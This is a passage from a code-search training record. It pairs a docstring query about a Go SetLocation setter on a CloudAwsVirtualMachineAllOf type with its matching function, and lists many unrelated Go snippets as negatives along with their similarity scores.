IsValid() bool {\n\treturn g.Point.IsValid()\n}", "func (o *InvoiceSeller) HasAddress() bool {\n\tif o != nil && o.Address != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *VmRestorePoint) HasRegionId() bool {\n\tif o != nil && o.RegionId != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *GroupReplaceRequest) HasAddress() bool {\n\tif o != nil && o.Address != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *Ga4ghTumourboard) HasPatientOrFamilyInformedOfGermlineVariant() bool {\n\tif o != nil && o.PatientOrFamilyInformedOfGermlineVariant != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *User) HasCountry() bool {\n\tif o != nil && o.Country != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (s Setup) Defined() bool {\n\tvar defined bool\n\n\tif len(s.Backends) > 0 {\n\t\tdefined = true\n\t}\n\tif len(s.ConfigStores) > 0 {\n\t\tdefined = true\n\t}\n\tif len(s.Loggers) > 0 {\n\t\tdefined = true\n\t}\n\tif len(s.KVStores) > 0 {\n\t\tdefined = true\n\t}\n\n\treturn defined\n}", "func (o *SmscSession) HasLocalAddr() bool {\n\tif o != nil && o.LocalAddr != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *Wireless) HasSiteId() bool {\n\tif o != nil && o.SiteId != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *LocalDatabaseProvider) HasUpdated() bool {\n\tif o != nil && o.Updated != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *Global) HasCfgPath() bool {\n\tif o != nil && o.CfgPath != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func HasProp(name string) bool {\n\tif global == nil {\n\t\treturn false\n\t}\n\n\treturn global.HasProp(name)\n}", "func (d UserData) HasCountry() bool {\n\treturn d.ModelData.Has(models.NewFieldName(\"Country\", \"country_id\"))\n}", "func (o *ViewMetaPage) HasPageOffset() bool {\n\tif o != nil && o.PageOffset != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func HasPosition() predicate.Salary {\n\treturn predicate.Salary(func(s *sql.Selector) {\n\t\tstep := sqlgraph.NewStep(\n\t\t\tsqlgraph.From(Table, FieldID),\n\t\t\tsqlgraph.To(PositionTable, FieldID),\n\t\t\tsqlgraph.Edge(sqlgraph.M2O, true, PositionTable, PositionColumn),\n\t\t)\n\t\tsqlgraph.HasNeighbors(s, step)\n\t})\n}", "func (o *NewData) GetLocationOk() (*Location, bool) {\n\tif o == nil || o.Location == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Location, true\n}" ]
[ "0.7748825", "0.7462635", "0.7278813", "0.71227956", "0.70187914", "0.6982081", "0.6903531", "0.68814874", "0.6704332", "0.66840494", "0.66046214", "0.6583322", "0.6561278", "0.6531216", "0.6517768", "0.6500131", "0.6450799", "0.64454514", "0.6428099", "0.64204055", "0.63024014", "0.6228591", "0.6039627", "0.6021668", "0.6016658", "0.59571767", "0.59389263", "0.59367025", "0.5931277", "0.5926857", "0.590993", "0.5900246", "0.586784", "0.5865912", "0.5805852", "0.579334", "0.57839555", "0.57728535", "0.57643425", "0.5709433", "0.5656755", "0.5643937", "0.5633291", "0.56300735", "0.5627381", "0.5623056", "0.5605106", "0.55951834", "0.55825627", "0.5577875", "0.55740994", "0.55594873", "0.5558292", "0.55460894", "0.5545678", "0.5542472", "0.55377054", "0.55362177", "0.5529525", "0.55254495", "0.5500463", "0.5499396", "0.5483323", "0.5480762", "0.54753715", "0.5472568", "0.54715437", "0.54696405", "0.54498714", "0.5436422", "0.54247856", "0.54211324", "0.5419377", "0.54191595", "0.5418182", "0.5405207", "0.5380516", "0.53663844", "0.5364075", "0.53531647", "0.534403", "0.5341027", "0.53241885", "0.5324187", "0.5321988", "0.5321673", "0.5321335", "0.5313596", "0.53123385", "0.5309055", "0.53084797", "0.53084004", "0.53057677", "0.53024244", "0.53003615", "0.5299583", "0.5287611", "0.5282473", "0.5282034", "0.52753055" ]
0.7389709
2
SetLocation gets a reference to the given CloudAwsVpcRelationship and assigns it to the Location field.
func (o *CloudAwsVirtualMachineAllOf) SetLocation(v CloudAwsVpcRelationship) { o.Location = &v }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (t *TransientDescriptor) SetLocation(location *url.URL) (*TransientDescriptor, error) {\n\tif t == nil {\n\t\treturn nil, errors.New(\"reference to transient descriptor is nil\")\n\t}\n\n\tif location == nil {\n\t\treturn nil, errors.New(\"nil pointer value for `location` parameter\")\n\t}\n\n\tt.Lock()\n\tdefer t.Unlock()\n\n\tt.location = location\n\treturn t, nil\n}", "func (m *CarserviceMutation) SetLocation(s string) {\n\tm.location = &s\n}", "func (r *OutputRecord) SetLocation(countryName string, latitude float32, longitude float32, timezone string) {\n\tr.GeoIP.IP = r.IPAddress\n\tr.GeoIP.CountryName = countryName\n\tr.GeoIP.Latitude = latitude\n\tr.GeoIP.Longitude = longitude\n\tr.GeoIP.Location[0] = r.GeoIP.Longitude\n\tr.GeoIP.Location[1] = r.GeoIP.Latitude\n\tr.GeoIP.Timezone = timezone\n}", "func (options *GetDiscoveredKmsInstancesOptions) SetLocation(location string) *GetDiscoveredKmsInstancesOptions {\n\toptions.Location = core.StringPtr(location)\n\treturn options\n}", "func (o *CloudAwsVirtualMachineAllOf) GetLocation() CloudAwsVpcRelationship {\n\tif o == nil || o.Location == nil {\n\t\tvar ret CloudAwsVpcRelationship\n\t\treturn ret\n\t}\n\treturn *o.Location\n}", "func (m *PrintConnector) SetLocation(value PrinterLocationable)() {\n err := m.GetBackingStore().Set(\"location\", value)\n if err != nil {\n panic(err)\n }\n}", "func (wec *WorkExperienceCreate) SetLocation(s string) *WorkExperienceCreate {\n\twec.mutation.SetLocation(s)\n\treturn wec\n}", "func (el *gameStruct) SetLocation(loc dir.Location) {\n\tloc.Wrap(el.game.Dimensions())\n\tel.location = loc\n}", "func (options *ReplaceJobOptions) SetLocation(location string) *ReplaceJobOptions {\n\toptions.Location = core.StringPtr(location)\n\treturn options\n}", "func (u *User) SetLocation(tx *pop.Connection, location Location) error {\n\tif u.LocationID.Valid {\n\t\tlocation.ID = u.LocationID.Int\n\t\tu.Location = location\n\t\treturn u.Location.Update(tx)\n\t}\n\tif err := location.Create(tx); err != nil {\n\t\treturn err\n\t}\n\tu.LocationID = nulls.NewInt(location.ID)\n\treturn u.Save(tx)\n}", "func (o *Transaction) SetLocation(v Location) {\n\to.Location = v\n}", "func (options *ReplaceKmsSettingsOptions) SetLocation(location string) *ReplaceKmsSettingsOptions {\n\toptions.Location = core.StringPtr(location)\n\treturn options\n}", "func (o *DcimRacksListParams) SetLocation(location *string) {\n\to.Location = location\n}", "func (options *UpdateActionOptions) SetLocation(location string) *UpdateActionOptions {\n\toptions.Location = core.StringPtr(location)\n\treturn options\n}", "func (o *BaseReportTransaction) SetLocation(v Location) {\n\to.Location = &v\n}", "func (in *ActionLocationNetworkCreateInput) SetLocation(value int64) *ActionLocationNetworkCreateInput {\n\tin.Location = value\n\n\tif in._selectedParameters == nil {\n\t\tin._selectedParameters = make(map[string]interface{})\n\t}\n\n\tin.SetLocationNil(false)\n\tin._selectedParameters[\"Location\"] = nil\n\treturn in\n}", "func (r *RedirectNode) SetLocation(s Expr) { r.location = s }", "func (options *CreateJobOptions) SetLocation(location string) *CreateJobOptions {\n\toptions.Location = core.StringPtr(location)\n\treturn options\n}", "func (options *CreateActionOptions) SetLocation(location string) *CreateActionOptions {\n\toptions.Location = core.StringPtr(location)\n\treturn options\n}", "func (scsuo *SurveyCellScanUpdateOne) SetLocation(l *Location) *SurveyCellScanUpdateOne {\n\treturn scsuo.SetLocationID(l.ID)\n}", "func (m *ServicePrincipalRiskDetection) SetLocation(value SignInLocationable)() {\n err := m.GetBackingStore().Set(\"location\", value)\n if err != nil {\n panic(err)\n }\n}", "func (options *CreateWorkspaceOptions) SetLocation(location string) *CreateWorkspaceOptions {\n\toptions.Location = core.StringPtr(location)\n\treturn options\n}", "func (in *ActionUserRequestRegistrationCreateInput) SetLocation(value int64) *ActionUserRequestRegistrationCreateInput {\n\tin.Location = value\n\n\tif in._selectedParameters == nil {\n\t\tin._selectedParameters = make(map[string]interface{})\n\t}\n\n\tin.SetLocationNil(false)\n\tin._selectedParameters[\"Location\"] = nil\n\treturn in\n}", "func (options *GetKmsSettingsOptions) SetLocation(location string) *GetKmsSettingsOptions {\n\toptions.Location = core.StringPtr(location)\n\treturn options\n}", "func (_options *CreateProjectOptions) SetLocation(location string) *CreateProjectOptions {\n\t_options.Location = core.StringPtr(location)\n\treturn _options\n}", "func (scsu *SurveyCellScanUpdate) SetLocation(l *Location) *SurveyCellScanUpdate {\n\treturn scsu.SetLocationID(l.ID)\n}", "func (term *Term) SetLoc(loc *Location) {\n\tterm.SetLocation(loc)\n}", "func (term *Term) SetLocation(loc *Location) *Term {\n\tterm.Location = loc\n\treturn term\n}", "func (o *NewData) SetLocation(v Location) {\n\to.Location = &v\n}", "func (wou *WorkOrderUpdate) SetLocation(l *Location) *WorkOrderUpdate {\n\treturn wou.SetLocationID(l.ID)\n}", "func (mb *MovieBuilder) SetLocation() *MovieLocationBuilder {\n\treturn &MovieLocationBuilder{*mb}\n}", "func (o *SessionDevice) SetLocation(v string) {\n\to.Location = &v\n}", "func (r *Pet) SetRelationship(field string, rel interface{}) error {\n\treturn fmt.Errorf(\"kallax: model Pet has no relationships\")\n}", "func (o *SyntheticsTriggerCITestRunResult) SetLocation(v int64) {\n\to.Location = &v\n}", "func (wouo *WorkOrderUpdateOne) SetLocation(l *Location) *WorkOrderUpdateOne {\n\treturn wouo.SetLocationID(l.ID)\n}", "func (in *ActionIpAddressIndexInput) SetLocation(value int64) *ActionIpAddressIndexInput {\n\tin.Location = value\n\n\tif in._selectedParameters == nil {\n\t\tin._selectedParameters = make(map[string]interface{})\n\t}\n\n\tin.SetLocationNil(false)\n\tin._selectedParameters[\"Location\"] = nil\n\treturn in\n}", "func (o *GetUserGoogleRedirectSeeOther) SetLocation(location string) {\n\to.Location = location\n}", "func (m *WorkbookOperation) SetResourceLocation(value *string)() {\n m.resourceLocation = value\n}", "func (m *ScheduleItem) SetLocation(value *string)() {\n err := m.GetBackingStore().Set(\"location\", value)\n if err != nil {\n panic(err)\n }\n}", "func (ec *EquipmentCreate) SetLocation(l *Location) *EquipmentCreate {\n\treturn ec.SetLocationID(l.ID)\n}", "func (r *Person) SetRelationship(field string, rel interface{}) error {\n\tswitch field {\n\tcase \"Pets\":\n\t\trecords, ok := rel.([]kallax.Record)\n\t\tif !ok {\n\t\t\treturn fmt.Errorf(\"kallax: relationship field %s needs a collection of records, not %T\", field, rel)\n\t\t}\n\n\t\tr.Pets = make([]*Pet, len(records))\n\t\tfor i, record := range records {\n\t\t\trel, ok := record.(*Pet)\n\t\t\tif !ok {\n\t\t\t\treturn fmt.Errorf(\"kallax: element of type %T cannot be added to relationship %s\", record, field)\n\t\t\t}\n\t\t\tr.Pets[i] = rel\n\t\t}\n\t\treturn nil\n\n\t}\n\treturn fmt.Errorf(\"kallax: model Person has no relationship %s\", field)\n}", "func (o *User) SetProfileLocation(v string) {\n\to.ProfileLocation = &v\n}", "func (o *CreateTaskCreated) SetLocation(location strfmt.URI) {\n\to.Location = location\n}", "func (s *CustomLogSourceProvider) SetLocation(v string) *CustomLogSourceProvider {\n\ts.Location = &v\n\treturn s\n}", "func (fc *FileCreate) SetLocation(l *Location) *FileCreate {\n\treturn fc.SetLocationID(l.ID)\n}", "func (euo *EquipmentUpdateOne) SetLocation(l *Location) *EquipmentUpdateOne {\n\treturn euo.SetLocationID(l.ID)\n}", "func WithLocation(v string) (p Pair) {\n\treturn Pair{Key: \"location\", Value: v}\n}", "func (as AccountStorage) SetRelationship(ctx sdk.Context, me types.AccountKey, other types.AccountKey, relationship *Relationship) sdk.Error {\n\tstore := ctx.KVStore(as.key)\n\trelationshipByte, err := as.cdc.MarshalJSON(*relationship)\n\tif err != nil {\n\t\treturn ErrFailedToMarshalRelationship(err)\n\t}\n\tstore.Set(getRelationshipKey(me, other), relationshipByte)\n\treturn nil\n}", "func (r *Session) SetRelationship(field string, rel interface{}) error {\n\treturn fmt.Errorf(\"kallax: model Session has no relationships\")\n}", "func SetWatchdogViaLocation(iLocation string, watchdog *Watchdog) (int64, error) {\n\twatchdog.Location = iLocation\n\treturn Engine.Insert(watchdog)\n}", "func (in *ActionIpAddressIndexInput) SetLocationNil(set bool) *ActionIpAddressIndexInput {\n\tif in._nilParameters == nil {\n\t\tif !set {\n\t\t\treturn in\n\t\t}\n\t\tin._nilParameters = make(map[string]interface{})\n\t}\n\n\tif set {\n\t\tin._nilParameters[\"Location\"] = nil\n\t\tin.SelectParameters(\"Location\")\n\t} else {\n\t\tdelete(in._nilParameters, \"Location\")\n\t}\n\treturn in\n}", "func (eu *EquipmentUpdate) SetLocation(l *Location) *EquipmentUpdate {\n\treturn eu.SetLocationID(l.ID)\n}", "func (m *LongRunningOperation) SetResourceLocation(value *string)() {\n err := m.GetBackingStore().Set(\"resourceLocation\", value)\n if err != nil {\n panic(err)\n }\n}", "func (c *Character) SetLocation(x int, y int) {\n\t//randomize initial stats\n\tc.curX = x\n\tc.curY = y\n}", "func (r *PollVote) SetRelationship(field string, rel interface{}) error {\n\treturn fmt.Errorf(\"kallax: model PollVote has no relationships\")\n}", "func (in *ActionLocationNetworkCreateInput) SetLocationNil(set bool) *ActionLocationNetworkCreateInput {\n\tif in._nilParameters == nil {\n\t\tif !set {\n\t\t\treturn in\n\t\t}\n\t\tin._nilParameters = make(map[string]interface{})\n\t}\n\n\tif set {\n\t\tin._nilParameters[\"Location\"] = nil\n\t\tin.SelectParameters(\"Location\")\n\t} else {\n\t\tdelete(in._nilParameters, \"Location\")\n\t}\n\treturn in\n}", "func (m *RelatedContact) SetRelationship(value *ContactRelationship)() {\n err := m.GetBackingStore().Set(\"relationship\", value)\n if err != nil {\n panic(err)\n }\n}", "func (c *Client) SetRelationship(userID discord.UserID, t discord.RelationshipType) error {\n\tvar body = struct {\n\t\tType discord.RelationshipType `json:\"type\"`\n\t}{\n\t\tType: t,\n\t}\n\n\treturn c.FastRequest(\n\t\t\"PUT\", EndpointMe+\"/relationships/\"+userID.String(),\n\t\thttputil.WithJSONBody(body),\n\t)\n}", "func (m *VpnConfiguration) SetRole(value *string)() {\n err := m.GetBackingStore().Set(\"role\", value)\n if err != nil {\n panic(err)\n }\n}", "func (in *ActionUserRequestRegistrationCreateInput) SetLocationNil(set bool) *ActionUserRequestRegistrationCreateInput {\n\tif in._nilParameters == nil {\n\t\tif !set {\n\t\t\treturn in\n\t\t}\n\t\tin._nilParameters = make(map[string]interface{})\n\t}\n\n\tif set {\n\t\tin._nilParameters[\"Location\"] = nil\n\t\tin.SelectParameters(\"Location\")\n\t} else {\n\t\tdelete(in._nilParameters, \"Location\")\n\t}\n\treturn in\n}", "func (s *GenerateChangeSetOutput) SetS3Location(v *S3Location) *GenerateChangeSetOutput {\n\ts.S3Location = v\n\treturn s\n}", "func (r *PollOption) SetRelationship(field string, rel interface{}) error {\n\tswitch field {\n\tcase \"Owner\":\n\t\tval, ok := rel.(*Poll)\n\t\tif !ok {\n\t\t\treturn fmt.Errorf(\"kallax: record of type %t can't be assigned to relationship Owner\", rel)\n\t\t}\n\t\tif !val.GetID().IsEmpty() {\n\t\t\tr.Owner = val\n\t\t}\n\n\t\treturn nil\n\n\t}\n\treturn fmt.Errorf(\"kallax: model PollOption has no relationship %s\", field)\n}", "func (user *User) SetMyLocation(location string) bool {\n\tset := Setting{\n\t\tKey: data.LocationKey,\n\t\tValue: location,\n\t}\n\treturn user.doInfoSettings(set)\n}", "func (l *Location) NewLocation(relativePath string) (vfs.Location, error) {\n\tif l == nil {\n\t\treturn nil, errors.New(\"non-nil sftp.Location pointer receiver is required\")\n\t}\n\n\t// make a copy of the original location first, then ChangeDir, leaving the original location as-is\n\tnewLocation := &Location{}\n\t*newLocation = *l\n\terr := newLocation.ChangeDir(relativePath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn newLocation, nil\n}", "func (*BgpAmazonVpc) PutPath(ref string) string {\n\treturn fmt.Sprintf(\"/api/objects/bgp/amazon_vpc/%s\", ref)\n}", "func (m *CarserviceMutation) ResetLocation() {\n\tm.location = nil\n}", "func (s *DashConfigurationForPut) SetMpdLocation(v string) *DashConfigurationForPut {\n\ts.MpdLocation = &v\n\treturn s\n}", "func (client *AccessGovernanceCPClient) SetRegion(region string) {\n\tclient.Host = common.StringToRegion(region).EndpointForTemplate(\"accessgovernancecp\", \"https://cp-prod.access-governance.{region}.oci.{secondLevelDomain}\")\n}", "func (e *Err) SetLocation(callDepth int) {\n\t_, file, line, _ := runtime.Caller(callDepth + 1)\n\te.file = trimSourcePath(file)\n\te.line = line\n}", "func (r *StatsPeriod) SetRelationship(field string, rel interface{}) error {\n\treturn fmt.Errorf(\"kallax: model StatsPeriod has no relationships\")\n}", "func (lc *LocationController) SetAvailability(\n\tdriverID int32,\n\tcur_loc_lat float32,\n\tcur_loc_lng float32,\n\tavailable NearbySearch_Availability) (*SetObjectResponseObject, error) {\n\n\t// get current driver status\n\tdriverExistObj, err := lc.locationService.GetObject(Object_Collection_Fleet, driverID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// check if response object is empty\n\tif driverExistObj == nil {\n\t\treturn nil, errors.New(\"response object is empty\")\n\t}\n\n\tvar driverStatus DriverStatus\n\tswitch available {\n\tcase NearbySearch_Availability_1:\n\t\tdriverStatus = DriverStatus_AVAILABLE\n\tdefault:\n\t\tdriverStatus = DriverStatus_NOTAVAILABLE\n\t}\n\n\t// get fleet info\n\tdriverFleetInfo, err := lc.fleetService.GetDriverFleetInfo(driverID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Construct LocationObject in GeoJSON format\n\tlocationObj := new(LocationObject)\n\tlocationObj.Type = LocationObject_Type_Point\n\tlocationObj.Coordinates = [2]float32{cur_loc_lat, cur_loc_lng}\n\ttimeNow := time.Now().Unix()\n\tfields := LocationObject_Fields{}\n\t// if driver object exist\n\tif driverExistObj.Ok && driverExistObj.Fields.DriverID != 0 {\n\t\t// if driver is currently busy, throw error: cannot set availability when busy on job\n\t\tif driverExistObj.Fields.Status == DriverStatus_BUSY {\n\t\t\treturn nil, errors.New(\"cannot change driver availability because driver is busy on job\")\n\t\t}\n\n\t\t// setup param object\n\t\tfields = LocationObject_Fields{\n\t\t\t\"providerid\": driverFleetInfo.Data.ProviderID,\n\t\t\t\"driverstatus\": int32(driverStatus),\n\t\t\t\"jobid\": 0,\n\t\t\t\"activeserviceid\": driverFleetInfo.Data.ActiveServiceID,\n\t\t\t\"activeservicetypeid\": driverFleetInfo.Data.ActiveServiceTypeID,\n\t\t\t\"priority\": driverFleetInfo.Data.Priority,\n\t\t\t\"lastupdatedtime\": timeNow,\n\t\t}\n\t} else {\n\n\t\tfields = LocationObject_Fields{\n\t\t\t\"driverid\": driverID,\n\t\t\t\"providerid\": driverFleetInfo.Data.ProviderID,\n\t\t\t\"driverstatus\": int32(driverStatus),\n\t\t\t\"jobid\": 0,\n\t\t\t\"activeserviceid\": driverFleetInfo.Data.ActiveServiceID,\n\t\t\t\"activeservicetypeid\": driverFleetInfo.Data.ActiveServiceTypeID,\n\t\t\t\"priority\": driverFleetInfo.Data.Priority,\n\t\t\t\"lastupdatedtime\": timeNow,\n\t\t}\n\t}\n\n\t// Update object\n\tres, err := lc.locationService.SetObject(Object_Collection_Fleet, driverID, locationObj, fields)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// check if ok is false\n\tif res.Ok == false {\n\t\treturn nil, errors.New(res.Error)\n\t}\n\n\tlog.Printf(\"Driver availability updated: %v\\n\", res.Ok)\n\treturn res, nil\n}", "func (r *ProjectsLocationsConnectionProfilesService) SetIamPolicy(resource string, setiampolicyrequest *SetIamPolicyRequest) *ProjectsLocationsConnectionProfilesSetIamPolicyCall {\n\tc := &ProjectsLocationsConnectionProfilesSetIamPolicyCall{s: r.s, urlParams_: make(gensupport.URLParams)}\n\tc.resource = resource\n\tc.setiampolicyrequest = setiampolicyrequest\n\treturn c\n}", "func (o *CloudAwsVirtualMachineAllOf) GetLocationOk() (*CloudAwsVpcRelationship, bool) {\n\tif o == nil || o.Location == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Location, true\n}", "func (sys *System) SetParents(ctx *Context, location string, parents []string) (string, error) {\n\tthen := Now()\n\tatomic.AddUint64(&sys.stats.TotalCalls, uint64(1))\n\tLog(INFO, ctx, \"System.SetParents\", \"location\", location, \"parents\", parents)\n\tvar loc *Location\n\tvar err error\n\tloc, err = sys.findLocation(ctx, location, true)\n\tdefer sys.releaseLocation(ctx, location)\n\tvar id string\n\tif err == nil {\n\t\tMetric(ctx, \"System.SetParents\", \"location\", location)\n\t\tid, err = loc.SetParents(ctx, parents)\n\t}\n\tif err != nil {\n\t\tLog(ERROR, ctx, \"System.SetParents\", \"location\", location, \"error\", err)\n\t}\n\tatomic.AddUint64(&sys.stats.TotalTime, uint64(Now()-then))\n\treturn id, sys.stats.IncErrors(err)\n}", "func (o AwsVpcPeeringConnectionOutput) AwsVpcRegion() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *AwsVpcPeeringConnection) pulumi.StringOutput { return v.AwsVpcRegion }).(pulumi.StringOutput)\n}", "func (o ConnectionProfileOutput) Location() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *ConnectionProfile) pulumi.StringPtrOutput { return v.Location }).(pulumi.StringPtrOutput)\n}", "func (k msgServer) SetGovAddress(goCtx context.Context, msg *types.MsgSetGovAddress) (*types.MsgSetGovAddressResponse, error) {\n\n\treturn &types.MsgSetGovAddressResponse{}, nil\n}", "func (m *TeamsAsyncOperation) SetTargetResourceLocation(value *string)() {\n m.targetResourceLocation = value\n}", "func (o PartnerRegionInfoResponseOutput) Location() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v PartnerRegionInfoResponse) *string { return v.Location }).(pulumi.StringPtrOutput)\n}", "func (o *PeerProperty) SetCrawl(ctx context.Context, exec boil.ContextExecutor, insert bool, related *Crawl) error {\n\tvar err error\n\tif insert {\n\t\tif err = related.Insert(ctx, exec, boil.Infer()); err != nil {\n\t\t\treturn errors.Wrap(err, \"failed to insert into foreign table\")\n\t\t}\n\t}\n\n\tupdateQuery := fmt.Sprintf(\n\t\t\"UPDATE \\\"peer_properties\\\" SET %s WHERE %s\",\n\t\tstrmangle.SetParamNames(\"\\\"\", \"\\\"\", 1, []string{\"crawl_id\"}),\n\t\tstrmangle.WhereClause(\"\\\"\", \"\\\"\", 2, peerPropertyPrimaryKeyColumns),\n\t)\n\tvalues := []interface{}{related.ID, o.ID}\n\n\tif boil.IsDebug(ctx) {\n\t\twriter := boil.DebugWriterFrom(ctx)\n\t\tfmt.Fprintln(writer, updateQuery)\n\t\tfmt.Fprintln(writer, values)\n\t}\n\tif _, err = exec.ExecContext(ctx, updateQuery, values...); err != nil {\n\t\treturn errors.Wrap(err, \"failed to update local table\")\n\t}\n\n\to.CrawlID = related.ID\n\tif o.R == nil {\n\t\to.R = &peerPropertyR{\n\t\t\tCrawl: related,\n\t\t}\n\t} else {\n\t\to.R.Crawl = related\n\t}\n\n\tif related.R == nil {\n\t\trelated.R = &crawlR{\n\t\t\tPeerProperties: PeerPropertySlice{o},\n\t\t}\n\t} else {\n\t\trelated.R.PeerProperties = append(related.R.PeerProperties, o)\n\t}\n\n\treturn nil\n}", "func (bam BlockAddressMap) Set(loc BlockLocation, path string) {\n\tif bam[loc.FileIndex] == nil {\n\t\tbam[loc.FileIndex] = make(map[int64]string)\n\t}\n\tbam[loc.FileIndex][loc.BlockIndex] = path\n}", "func (o *Origin) SetOriginOPUEK(ctx context.Context, exec boil.ContextExecutor, insert bool, related ...*OriginPublicEncryptionKey) error {\n\tquery := \"update \\\"origin_public_encryption_keys\\\" set \\\"origin\\\" = null where \\\"origin\\\" = $1\"\n\tvalues := []interface{}{o.Name}\n\tif boil.DebugMode {\n\t\tfmt.Fprintln(boil.DebugWriter, query)\n\t\tfmt.Fprintln(boil.DebugWriter, values)\n\t}\n\n\t_, err := exec.ExecContext(ctx, query, values...)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"failed to remove relationships before set\")\n\t}\n\n\tif o.R != nil {\n\t\tfor _, rel := range o.R.OriginOPUEK {\n\t\t\tqueries.SetScanner(&rel.Origin, nil)\n\t\t\tif rel.R == nil {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\trel.R.OriginName = nil\n\t\t}\n\n\t\to.R.OriginOPUEK = nil\n\t}\n\treturn o.AddOriginOPUEK(ctx, exec, insert, related...)\n}", "func (o *PutRelationshipsIDParams) SetRelationship(relationship *models.Relationship) {\n\to.Relationship = relationship\n}", "func (o *Hdd) SetControllerLocation(v float32) {\n\to.ControllerLocation = &v\n}", "func SetRegion(r string) {\n\tcurrentRegion = r\n}", "func (o *MDRaid) SetBitmapLocation(ctx context.Context, value []byte, options map[string]dbus.Variant) (err error) {\n\terr = o.object.CallWithContext(ctx, InterfaceMDRaid+\".SetBitmapLocation\", 0, value, options).Store()\n\treturn\n}", "func (lp *LoadPoint) SetTargetSoC(soc int) error {\n\tif lp.vehicle == nil {\n\t\treturn api.ErrNotAvailable\n\t}\n\n\tlp.Lock()\n\tdefer lp.Unlock()\n\n\tlp.log.INFO.Println(\"set target soc:\", soc)\n\n\t// apply immediately\n\tif lp.SoC.Target != soc {\n\t\tlp.SoC.Target = soc\n\t\tlp.publish(\"targetSoC\", soc)\n\t\tlp.requestUpdate()\n\t}\n\n\treturn nil\n}", "func (location *Location) AssignProperties_To_Location(destination *v20210515s.Location) error {\n\t// Create a new property bag\n\tpropertyBag := genruntime.NewPropertyBag()\n\n\t// FailoverPriority\n\tif location.FailoverPriority != nil {\n\t\tfailoverPriority := *location.FailoverPriority\n\t\tdestination.FailoverPriority = &failoverPriority\n\t} else {\n\t\tdestination.FailoverPriority = nil\n\t}\n\n\t// IsZoneRedundant\n\tif location.IsZoneRedundant != nil {\n\t\tisZoneRedundant := *location.IsZoneRedundant\n\t\tdestination.IsZoneRedundant = &isZoneRedundant\n\t} else {\n\t\tdestination.IsZoneRedundant = nil\n\t}\n\n\t// LocationName\n\tdestination.LocationName = genruntime.ClonePointerToString(location.LocationName)\n\n\t// Update the property bag\n\tif len(propertyBag) > 0 {\n\t\tdestination.PropertyBag = propertyBag\n\t} else {\n\t\tdestination.PropertyBag = nil\n\t}\n\n\t// No error\n\treturn nil\n}", "func (c *Client) ConfigureChcAssistVpc(request *ConfigureChcAssistVpcRequest) (response *ConfigureChcAssistVpcResponse, err error) {\n return c.ConfigureChcAssistVpcWithContext(context.Background(), request)\n}", "func (m *PrinterLocation) SetCountryOrRegion(value *string)() {\n err := m.GetBackingStore().Set(\"countryOrRegion\", value)\n if err != nil {\n panic(err)\n }\n}", "func (m *User) SetOfficeLocation(value *string)() {\n m.officeLocation = value\n}", "func (c *Chip8) SetPC(newaddr uint16) {\n\tc.pc = newaddr\n}", "func (me *TAttlistLocationLabelType) Set(s string) { (*xsdt.Token)(me).Set(s) }", "func (s *GetWorkspaceOutput) SetS3Location(v string) *GetWorkspaceOutput {\n\ts.S3Location = &v\n\treturn s\n}", "func (o *Origin) SetOriginOPK(ctx context.Context, exec boil.ContextExecutor, insert bool, related ...*OriginPublicKey) error {\n\tquery := \"update \\\"origin_public_keys\\\" set \\\"origin\\\" = null where \\\"origin\\\" = $1\"\n\tvalues := []interface{}{o.Name}\n\tif boil.DebugMode {\n\t\tfmt.Fprintln(boil.DebugWriter, query)\n\t\tfmt.Fprintln(boil.DebugWriter, values)\n\t}\n\n\t_, err := exec.ExecContext(ctx, query, values...)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"failed to remove relationships before set\")\n\t}\n\n\tif o.R != nil {\n\t\tfor _, rel := range o.R.OriginOPK {\n\t\t\tqueries.SetScanner(&rel.Origin, nil)\n\t\t\tif rel.R == nil {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\trel.R.OriginName = nil\n\t\t}\n\n\t\to.R.OriginOPK = nil\n\t}\n\treturn o.AddOriginOPK(ctx, exec, insert, related...)\n}", "func (lc *LocationController) UpdateDriverLocation(\n\tdriverID int32,\n\tcur_loc_lat float32,\n\tcur_loc_lng float32) (interface{}, error) {\n\n\t// get current driver status\n\tdriverExistObj, err := lc.locationService.GetObject(Object_Collection_Fleet, driverID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// check if response object is empty\n\tif driverExistObj == nil {\n\t\treturn nil, errors.New(\"response object is empty\")\n\t}\n\n\t// check if ok is false\n\t// example: id not found\n\tif driverExistObj.Ok == false {\n\t\treturn nil, errors.New(driverExistObj.Error)\n\t}\n\n\t// if driver is currently not available, throw error: cannot update driver location when driver is not available\n\tif driverExistObj.Ok && driverExistObj.Fields.DriverID != 0 && driverExistObj.Fields.Status == DriverStatus_NOTAVAILABLE {\n\t\treturn nil, errors.New(\"cannot update driver location when driver is not available\")\n\t}\n\n\t// Construct LocationObject in GeoJSON format\n\tlocationObj := new(LocationObject)\n\tlocationObj.Type = LocationObject_Type_Point\n\tlocationObj.Coordinates = [2]float32{cur_loc_lat, cur_loc_lng}\n\ttimeNow := time.Now().Unix()\n\tfields := LocationObject_Fields{\n\t\t//\"driverid\": driverID,\n\t\t//\"providerid\": providerID,\n\t\t//\"driverstatus\": int32(status),\n\t\t//\"jobid\": jobId,\n\t\t//\"activeserviceid\": 